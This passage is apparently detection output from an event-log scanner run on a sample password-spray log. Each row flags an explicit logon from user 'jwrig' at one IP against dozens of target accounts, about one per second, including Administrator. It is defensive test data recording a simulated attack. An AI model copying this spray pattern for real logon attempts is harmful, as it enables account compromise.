User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:12.857 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:13.904 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:14.972 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:16.050 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:17.129 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:18.186 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:19.254 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:20.329 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:21.401 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:22.487 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:23.577 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:24.660 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:25.732 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:26.794 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:27.863 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:28.925 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:29.993 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:31.050 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:32.142 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:33.206 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:34.265 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:35.340 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:36.403 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:37.453 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:38.533 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:39.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:40.691 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:41.769 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:42.852 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:43.922 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:44.998 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:46.080 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:47.159 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:48.237 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:49.314 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:50.388 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:51.455 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:52.532 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:53.613 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:54.668 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:55.714 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:56.768 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:57.850 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:30:58.920 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:00.029 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:01.113 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:02.172 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cmoody | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:03.238 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: psmith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:04.300 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jkulikowski | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:05.378 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: gsalinas | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:06.439 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: tbennett | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:07.513 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: econrad | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:08.581 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:09.674 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jleytevidal | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:10.754 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lpesce | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:11.843 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sanson | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:12.917 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: sarmstrong | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:13.987 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: wstrzelec | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:15.045 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: zmathis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:16.136 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: melliott | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:17.201 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: kperryman | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:18.302 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jorchilles | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:19.372 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jlake | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:20.450 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: edygert | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:21.552 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: drook | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:22.656 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dmashburn | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:23.749 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cspizor | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:24.832 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cragoso | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:25.919 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgalbraith | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:26.998 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bking | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:28.103 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mdouglas | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:29.187 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bgreenwood | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:30.262 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: baker | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:31.362 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ssims | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:32.419 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: smisenar | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:33.499 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:34.577 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:35.670 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:36.716 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:31:37.815 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: 
